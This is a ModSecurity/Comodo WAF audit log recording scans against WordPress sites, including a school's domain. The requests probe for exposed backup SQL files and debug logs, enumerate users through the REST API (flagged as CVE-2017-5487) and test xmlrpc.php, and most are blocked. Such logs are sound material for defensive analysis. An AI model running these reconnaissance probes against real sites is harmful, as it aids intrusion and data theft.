OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --60782d43-Z-- --032bb779-A-- [09/May/2025:02:12:56 +0700] aB0COMP9GxxPAbCroFZCdQAAAEY 103.236.140.4 55378 103.236.140.4 8181 --032bb779-B-- GET /wp-content/debug.log HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 154.83.103.201 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 154.83.103.201 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --032bb779-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --032bb779-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||manage.bataranetwork.com|F|2"] [data ".log"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746731576466423 2440 (- - -) Stopwatch2: 1746731576466423 2440; combined=884, p1=407, p2=448, p3=0, p4=0, p5=29, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --032bb779-Z-- --d3610a6e-A-- [09/May/2025:02:12:56 +0700] aB0COMP9GxxPAbCroFZCdwAAAEA 103.236.140.4 55386 103.236.140.4 8181 --d3610a6e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 154.83.103.201 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 154.83.103.201 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --d3610a6e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d3610a6e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||manage.bataranetwork.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746731576859010 1947 (- - -) Stopwatch2: 1746731576859010 1947; combined=1021, p1=347, p2=648, p3=0, p4=0, p5=26, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d3610a6e-Z-- --a6f06b44-A-- [09/May/2025:02:13:03 +0700] aB0CP8P9GxxPAbCroFZChgAAAEA 103.236.140.4 55454 103.236.140.4 8181 --a6f06b44-B-- GET /backup.sql HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 154.83.103.201 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 154.83.103.201 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --a6f06b44-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a6f06b44-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||manage.bataranetwork.com|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746731583975851 1553 (- - -) Stopwatch2: 1746731583975851 1553; combined=630, p1=309, p2=295, p3=0, p4=0, p5=26, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a6f06b44-Z-- --66bc8a5a-A-- [09/May/2025:02:13:04 +0700] aB0CQMP9GxxPAbCroFZChwAAAEo 103.236.140.4 55460 103.236.140.4 8181 --66bc8a5a-B-- GET /db_backup.sql HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 154.83.103.201 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 154.83.103.201 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --66bc8a5a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --66bc8a5a-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||manage.bataranetwork.com|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746731584146690 1684 (- - -) Stopwatch2: 1746731584146690 1684; combined=632, p1=303, p2=296, p3=0, p4=0, p5=32, sr=65, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --66bc8a5a-Z-- --9c70050a-A-- [09/May/2025:02:15:39 +0700] aB0C244K347NtBcwXKx2TwAAAI0 103.236.140.4 55600 103.236.140.4 8181 --9c70050a-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.107.243 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.107.243 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --9c70050a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9c70050a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746731739659073 3370 (- - -) Stopwatch2: 1746731739659073 3370; combined=1439, p1=515, p2=893, p3=0, p4=0, p5=31, sr=113, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9c70050a-Z-- --a27e3b07-A-- [09/May/2025:02:15:43 +0700] aB0C344K347NtBcwXKx2UAAAAI8 103.236.140.4 55604 103.236.140.4 8181 --a27e3b07-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.107.243 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.107.243 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --a27e3b07-C-- demo.sayHello --a27e3b07-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --a27e3b07-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746731743390493 17877 (- - -) Stopwatch2: 1746731743390493 17877; combined=29940, p1=445, p2=3013, p3=24, p4=24, p5=13230, sr=68, sw=69, l=0, gc=13135 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a27e3b07-Z-- --084bd353-A-- [09/May/2025:02:22:01 +0700] aB0EWSs5rYyn3jlLjjIrKQAAAM4 103.236.140.4 55798 103.236.140.4 8181 --084bd353-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 45.201.10.243 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.201.10.243 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --084bd353-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --084bd353-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746732121404503 2547 (- - -) Stopwatch2: 1746732121404503 2547; combined=1074, p1=365, p2=684, p3=0, p4=0, p5=25, sr=60, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --084bd353-Z-- --82e60138-A-- [09/May/2025:02:22:05 +0700] aB0EXY4K347NtBcwXKx2UQAAAJg 103.236.140.4 55802 103.236.140.4 8181 --82e60138-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 45.201.10.243 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.201.10.243 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --82e60138-C-- demo.sayHello --82e60138-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --82e60138-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746732125706158 5441 (- - -) Stopwatch2: 1746732125706158 5441; combined=4070, p1=523, p2=3314, p3=28, p4=31, p5=101, sr=73, sw=73, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --82e60138-Z-- --3fc8c423-A-- [09/May/2025:02:22:08 +0700] aB0EYMP9GxxPAbCroFZCrwAAAEM 103.236.140.4 55806 103.236.140.4 8181 --3fc8c423-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.86.143 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.86.143 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --3fc8c423-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3fc8c423-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746732128117062 1946 (- - -) Stopwatch2: 1746732128117062 1946; combined=880, p1=303, p2=556, p3=0, p4=0, p5=21, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3fc8c423-Z-- --8e9c355a-A-- [09/May/2025:02:22:12 +0700] aB0EZKcs1DvJ_HgMHE95_AAAABQ 103.236.140.4 55810 103.236.140.4 8181 --8e9c355a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.86.143 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.86.143 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --8e9c355a-C-- demo.sayHello --8e9c355a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --8e9c355a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746732132738679 5229 (- - -) Stopwatch2: 1746732132738679 5229; combined=3981, p1=521, p2=3253, p3=26, p4=28, p5=90, sr=71, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8e9c355a-Z-- --b40c5908-A-- [09/May/2025:02:23:04 +0700] aB0EmMP9GxxPAbCroFZCsQAAAFc 103.236.140.4 55814 103.236.140.4 8181 --b40c5908-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.91.171.128 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.91.171.128 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --b40c5908-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b40c5908-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746732184396515 3438 (- - -) Stopwatch2: 1746732184396515 3438; combined=1413, p1=473, p2=908, p3=0, p4=0, p5=32, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b40c5908-Z-- --49704a40-A-- [09/May/2025:02:23:07 +0700] aB0Emys5rYyn3jlLjjIrKwAAAM8 103.236.140.4 55818 103.236.140.4 8181 --49704a40-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.91.171.128 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.91.171.128 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --49704a40-C-- demo.sayHello --49704a40-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --49704a40-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746732187950071 4859 (- - -) Stopwatch2: 1746732187950071 4859; combined=3748, p1=490, p2=3054, p3=24, p4=28, p5=89, sr=91, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --49704a40-Z-- --212a2358-A-- [09/May/2025:02:37:35 +0700] aB0H_6cs1DvJ_HgMHE96CgAAAAM 103.236.140.4 55886 103.236.140.4 8181 --212a2358-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 192.140.17.11 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 192.140.17.11 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --212a2358-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --212a2358-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746733055321480 2582 (- - -) Stopwatch2: 1746733055321480 2582; combined=1169, p1=379, p2=757, p3=0, p4=0, p5=33, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --212a2358-Z-- --cbad6321-A-- [09/May/2025:02:43:24 +0700] aB0JXKcs1DvJ_HgMHE96EwAAABU 103.236.140.4 55932 103.236.140.4 8181 --cbad6321-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.165.207.83 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.165.207.83 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --cbad6321-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cbad6321-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746733404015824 2942 (- - -) Stopwatch2: 1746733404015824 2942; combined=1327, p1=467, p2=831, p3=0, p4=0, p5=29, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cbad6321-Z-- --0bc13b62-A-- [09/May/2025:03:27:08 +0700] aB0TnFoC-7ITMWTA_c9yYgAAAMc 103.236.140.4 56258 103.236.140.4 8181 --0bc13b62-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.73.94 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.73.94 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --0bc13b62-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0bc13b62-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746736028766141 3919 (- - -) Stopwatch2: 1746736028766141 3919; combined=1623, p1=541, p2=1043, p3=0, p4=0, p5=39, sr=101, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0bc13b62-Z-- --501c7e44-A-- [09/May/2025:03:27:11 +0700] aB0Tnx6q_ZMebht3q15KIgAAAJA 103.236.140.4 56262 103.236.140.4 8181 --501c7e44-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.73.94 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.73.94 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --501c7e44-C-- demo.sayHello --501c7e44-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --501c7e44-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746736031969830 5648 (- - -) Stopwatch2: 1746736031969830 5648; combined=3964, p1=565, p2=3177, p3=25, p4=23, p5=99, sr=82, sw=75, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --501c7e44-Z-- --47a42539-A-- [09/May/2025:03:35:27 +0700] aB0Vj1qQ1nOVx9fWpZS3RAAAAAo 103.236.140.4 56310 103.236.140.4 8181 --47a42539-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.56.147 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.56.147 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --47a42539-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --47a42539-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746736527260818 3081 (- - -) Stopwatch2: 1746736527260818 3081; combined=1238, p1=446, p2=767, p3=0, p4=0, p5=25, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --47a42539-Z-- --e4958427-A-- [09/May/2025:03:35:32 +0700] aB0VlC-fAO47ojYKsMoLKwAAAEw 103.236.140.4 56314 103.236.140.4 8181 --e4958427-B-- 